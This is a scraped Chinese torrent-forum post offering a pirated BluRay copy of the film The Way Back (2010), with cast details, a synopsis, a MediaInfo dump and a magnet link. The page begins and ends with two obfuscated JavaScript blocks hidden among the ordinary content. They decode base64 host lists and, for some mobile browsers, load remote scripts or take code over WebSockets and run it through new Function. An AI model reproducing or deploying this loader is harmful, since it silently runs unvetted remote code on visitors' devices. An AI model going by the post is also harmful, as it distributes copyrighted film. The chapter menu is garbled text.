回来的路[中文字幕].The.Way.Back.2010.1080p.BluRay.x265.10bit.DTS 9.01GB

版主小s 23天前 178

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 回来的路 / 亡命千万里(台) / 自由之路 / 归途 / 回家的路 / 回去的路
◎片  名 The Way Back
◎年  代 2010
◎产  地 美国
◎类  别 剧情 / 冒险
◎语  言 英语 / 波兰语 Polish / 俄语
◎上映日期 2010-09-03(特柳赖德电影节) / 2011-01-21(美国)
◎IMDb链接 https://www.imdb.com/title/tt1023114/
◎豆瓣评分 7.9/10 (14621人评价)
◎豆瓣链接 https://movie.douban.com/subject/3259973/
◎片  长 133分钟
◎导  演 彼得·威尔 Peter Weir (id:1022721)
◎编  剧 彼得·威尔 Peter Weir (id:1022721)
◎演  员 吉姆·斯特吉斯 Jim Sturgess (id:1053559)
       艾德·哈里斯 Ed Harris (id:1048024)
       西尔莎·罗南 Saoirse Ronan (id:1022004)
       科林·法瑞尔 Colin Farrell (id:1084255)
       德拉戈什·布库尔 Dragos Bucur (id:1018409)
       亚历山德鲁·波托切安 Alexandru Potocean (id:1045676)
       马克·斯特朗 Mark Strong (id:1274374)
       扎哈利·巴哈罗夫 Zachary Baharov (id:1331351)
       塞巴斯蒂安·乌泽多夫斯基 Sebastian Urzendowsky (id:1147610)
       古斯塔·斯卡斯加德 Gustaf Skarsg?rd (id:1040587)
       彼得·威尔 Peter Weir (id:1022721)
       拉塞尔·波伊德 Russell Boyd (id:1048378)

◎标  签 美国 / 剧情 / 美国电影 / 冒险 / 彼得·威尔 / ColinFarrell / 2010 / 柯林·法瑞尔

◎简  介
  1939年苏德瓜分波兰后不久,波兰青年维斯切克?乔努斯(吉姆?斯特吉斯 Jim Sturgess )因其所谓的“反党反斯大林”间谍行为,被送入了西伯利亚的劳动营。其时已是1940年,在严寒的西伯利亚,乔努斯结识了同为政治犯的演员安德烈,后者有一项酝酿多时的逃跑计划,美国老人史密斯(艾德?哈里斯 Ed Harris 饰)、罪犯沃尔卡(柯林?法瑞尔 Colin Farrell 饰)等人陆续加入了他们的小圈子,在一个大雪之夜,乔努斯等七人成功逃出劳动营,他们唯一知道的,是向南前往贝加尔湖,同时躲避无处不在的举报者。一路上有人难耐恶劣的气候死去,在将要抵达贝加尔湖时,一个神秘少女伊莲娜(西尔莎?罗南 Saoirse Ronan 饰)加入了他们,她的加入,令一行人预备穿过蒙古、西藏,翻越喜马拉雅抵达英控印度寻找自由的路程又平添了几许困难……

◎获奖情况 (共1项)
  第83届奥斯卡金像奖 (2011)
  最佳化妆(提名)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 114419124157588881298282870534550625724 (0x5614525DB8874C2705361371B4589DBC)
  4. Complete name                            : [email protected]kv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 9.01 GiB
  8. Duration                                 : 2 h 13 min
  9. Overall bit rate                         : 9 671 kb/s
  10. Encoded date                             : UTC 2021-11-05 23:24:57
  11. Writing application                      : mkvmerge v53.0.0 ('Fool's Gold') 64-bit
  12. Writing library                          : libebml v1.4.1 + libmatroska v1.6.2
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 2 h 13 min
  20. Bit rate                                 : 8 119 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 818 pixels
  23. Display aspect ratio                     : 2.35:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.216
  30. Stream size                              : 7.56 GiB (84%)
  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  32. Encoding settings                        : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x818 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  33. Language                                 : English
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : DTS
  39. Format/Info                              : Digital Theater Systems
  40. Codec ID                                 : A_DTS
  41. Duration                                 : 2 h 13 min
  42. Bit rate mode                            : Constant
  43. Bit rate                                 : 1 509 kb/s
  44. Channel(s)                               : 6 channels
  45. Channel layout                           : C L R Ls Rs LFE
  46. Sampling rate                            : 48.0 kHz
  47. Frame rate                               : 93.750 FPS (512 SPF)
  48. Bit depth                                : 16 bits
  49. Compression mode                         : Lossy
  50. Stream size                              : 1.40 GiB (16%)
  51. Default                                  : Yes
  52. Forced                                   : No
  53. Text #1
  54. ID                                       : 3
  55. Format                                   : PGS
  56. Muxing mode                              : zlib
  57. Codec ID                                 : S_HDMV/PGS
  58. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  59. Duration                                 : 2 h 3 min
  60. Bit rate                                 : 26.4 kb/s
  61. Count of elements                        : 2249
  62. Stream size                              : 23.3 MiB (0%)
  63. Language                                 : Chinese
  64. Default                                  : Yes
  65. Forced                                   : No
  66. Text #2
  67. ID                                       : 4
  68. Format                                   : PGS
  69. Muxing mode                              : zlib
  70. Codec ID                                 : S_HDMV/PGS
  71. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  72. Duration                                 : 2 h 3 min
  73. Bit rate                                 : 26.6 kb/s
  74. Count of elements                        : 2249
  75. Stream size                              : 23.5 MiB (0%)
  76. Language                                 : Chinese
  77. Default                                  : No
  78. Forced                                   : No
  79. Text #3
  80. ID                                       : 5
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 2 h 3 min
  86. Bit rate                                 : 15.4 kb/s
  87. Count of elements                        : 2249
  88. Stream size                              : 13.6 MiB (0%)
  89. Language                                 : Chinese
  90. Default                                  : No
  91. Forced                                   : No
  92. Text #4
  93. ID                                       : 6
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 2 h 3 min
  99. Bit rate                                 : 15.6 kb/s
  100. Count of elements                        : 2249
  101. Stream size                              : 13.7 MiB (0%)
  102. Language                                 : Chinese
  103. Default                                  : No
  104. Forced                                   : No
  105. Text #5
  106. ID                                       : 7
  107. Format                                   : PGS
  108. Muxing mode                              : zlib
  109. Codec ID                                 : S_HDMV/PGS
  110. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  111. Duration                                 : 2 h 3 min
  112. Bit rate                                 : 25.5 kb/s
  113. Count of elements                        : 2538
  114. Stream size                              : 22.6 MiB (0%)
  115. Language                                 : English
  116. Default                                  : No
  117. Forced                                   : No
  118. Menu
  119. 00:00:00.000                             : :绗?01 绔?
  120. 00:02:14.968                             : :绗?02 绔?
  121. 00:12:47.475                             : :绗?03 绔?
  122. 00:22:49.326                             : :绗?04 绔?
  123. 00:33:29.382                             : :绗?05 绔?
  124. 00:45:12.376                             : :绗?06 绔?
  125. 00:55:41.672                             : :绗?07 绔?
  126. 01:07:05.772                             : :绗?08 绔?
  127. 01:16:34.006                             : :绗?09 绔?
  128. 01:29:37.455                             : :绗?10 绔?
  129. 01:39:41.142                             : :绗?11 绔?
  130. 01:48:29.294                             : :绗?12 绔?
  131. 01:56:42.454                             : :绗?13 绔?
  132. 02:06:01.929                             : :绗?14 绔?
复制代码




TAGS 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:E56685B6DE505C69A7DDB7AA0426B24CD4B13AC6

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};